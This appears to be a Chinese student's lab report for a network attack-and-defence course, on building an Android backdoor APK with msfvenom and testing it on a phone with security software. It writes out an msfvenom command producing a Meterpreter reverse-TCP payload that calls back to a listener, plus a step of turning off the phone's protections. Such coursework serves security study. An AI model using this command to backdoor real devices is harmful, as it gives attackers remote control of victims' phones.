2019-2020-2 20175234 赵诗玥 《网络对抗技术》 Exp3+ 免杀进阶:msfvenom生成Android后门文件
实验内容
- msfvenom 生成Android平台的apk后门文件
实验环境
华为手机管家(内置Tencent、360、MODILE SECUNITY), Android程序安全补丁2020年1月1日
实验步骤
-
将虚拟机的网络模式改为桥接模式
-
实现手机、虚拟机互ping
-
msfvenom -l payloads
找到相应的 payload
-
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5234 R > 20175234test.apk
-
msfconsole
启动监听 -
把后门程序移到手机里头
-
安装apk报错,运行报错
-
解除管控,继续运行
可以运行但是很快就又死了,最初以为是手机杀后台,尝试wakelock
但是没有用,应该是杀软检测到了连接
- 网站测试